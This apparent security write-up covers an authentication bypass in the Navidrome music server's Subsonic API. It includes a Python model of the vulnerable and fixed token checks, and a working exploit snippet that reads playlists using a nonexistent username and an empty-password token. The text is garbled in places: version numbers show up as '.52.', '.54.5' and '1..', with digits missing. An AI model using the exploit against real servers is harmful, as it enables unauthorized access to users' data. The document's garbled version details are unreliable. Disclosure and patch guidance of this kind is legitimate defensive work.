Navidrome, a popular open-source web-based music collection server and streamer, has been found to have an authentication bypass vulnerability in its Subsonic API endpoints for versions .52. to .54.4. This vulnerability allows an attacker to gain unauthorized access to read-only data stored in Navidrome, such as user playlists. Although the vulnerability does not permit the attacker to modify data due to insufficient permissions, it still poses a risk in terms of unauthorized information access. The vulnerability has been patched in version .54.5.

Vulnerability Details

The authentication bypass vulnerability in Navidrome occurs due to a flaw in the authentication check process for certain Subsonic API endpoints. When an attacker provides an arbitrary username that does not exist on the system and a salted hash of an empty password, Navidrome treats the request as authenticated and grants access to various Subsonic endpoints without requiring valid credentials.
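To make the failure mode concrete, here is an added, simplified model of a Subsonic-style token check (example code written for this write-up, not Navidrome's implementation). It assumes the standard Subsonic token scheme, where the client sends t = md5(password + s) with a random salt s, and models the flaw as an unknown username resolving to a blank user record with an empty password instead of a hard failure. USERS, authenticate_vulnerable and authenticate_fixed are constructed names for the illustration.

```python
import hashlib
import hmac

# Constructed user store for the example. The Subsonic token scheme requires
# the server to know the plaintext password, which is why it is stored here.
USERS = {"alice": "correct horse battery staple"}


def subsonic_token(password: str, salt: str) -> str:
    """Token the client sends as the 't' parameter: md5(password + salt)."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def authenticate_vulnerable(u: str, t: str, s: str) -> bool:
    """Models the bypass described above (simplified, not Navidrome's code).

    An unknown username does not fail the lookup; it yields a blank record
    whose password is the empty string. The token check then succeeds for
    any caller who sends md5("" + s), i.e. the hash of an empty password.
    """
    password = USERS.get(u, "")
    return subsonic_token(password, s) == t


def authenticate_fixed(u: str, t: str, s: str) -> bool:
    """Hardened check: unknown users and empty passwords never authenticate."""
    password = USERS.get(u)
    if password is None or password == "":
        return False
    if not s:
        return False  # token auth is only meaningful with a salt present
    # Constant-time comparison so token checks do not leak timing information.
    return hmac.compare_digest(subsonic_token(password, s), t)


def demo() -> dict:
    """Returns the outcome of the same requests against both checks."""
    bypass_token = subsonic_token("", "")  # empty password, empty salt
    good_token = subsonic_token(USERS["alice"], "abc123")
    return {
        "unknown_user_vulnerable": authenticate_vulnerable("nonexistentuser", bypass_token, ""),
        "unknown_user_fixed": authenticate_fixed("nonexistentuser", bypass_token, ""),
        "valid_user_fixed": authenticate_fixed("alice", good_token, "abc123"),
    }


if __name__ == "__main__":
    print(demo())
```

The model shows why the attacker needs no knowledge of any real account: the "blank user" default turns a failed lookup into a user whose password is empty, and the empty-password token is trivially computable. The fixed variant fails closed on the lookup itself, which is the property to verify when reviewing any token-based login path.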

An example of exploiting this vulnerability through a simple API call can be seen in the code snippet below:

import hashlib
import requests

navidrome_url = "https://your-navidrome-instance/api/subsonic/rest/getPlaylists"
non_existent_username = "nonexistentuser"
salt = ""  # salt is empty
# Subsonic token authentication sends t = md5(password + salt);
# here the password is the empty string
salted_empty_password_hash = hashlib.md5(("" + salt).encode()).hexdigest()

payload = {
    "u": non_existent_username,  # username that does not exist on the server
    "t": salted_empty_password_hash,
    "s": salt,
    "v": "1..",  # version
    "c": "navidrome-exploit",  # client identifier
}

response = requests.get(url=navidrome_url, params=payload)
print(response.text)

By exploiting this vulnerability, an attacker can read data exposed through the affected Subsonic endpoints, such as playlists. The vulnerability does not permit the attacker to modify data: any attempt to do so is rejected with a "permission denied" error.

Patch and Mitigation

Navidrome developers have released a patch for this issue in version .54.5. Users are strongly encouraged to update their Navidrome installations to the latest version to resolve this security vulnerability.

References

1. Navidrome GitHub Repository: https://github.com/navidrome/navidrome
2. Vulnerability Details and Patch Commit: https://github.com/navidrome/navidrome/commit/cb1edb2e837494292b1a53c4785d470556f550b3
3. CVE Details and Description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27112

Conclusion

The Navidrome authentication bypass vulnerability in Subsonic API endpoints poses a risk in terms of unauthorized information access. Users running Navidrome versions .52. to .54.4 are vulnerable to this security issue. It is highly recommended that users update their Navidrome installations to version .54.5 or later to fix this vulnerability and protect their data from unauthorized access.

Timeline

Published on: 02/24/2025 19:15:14 UTC
Last modified on: 02/27/2025 20:24:21 UTC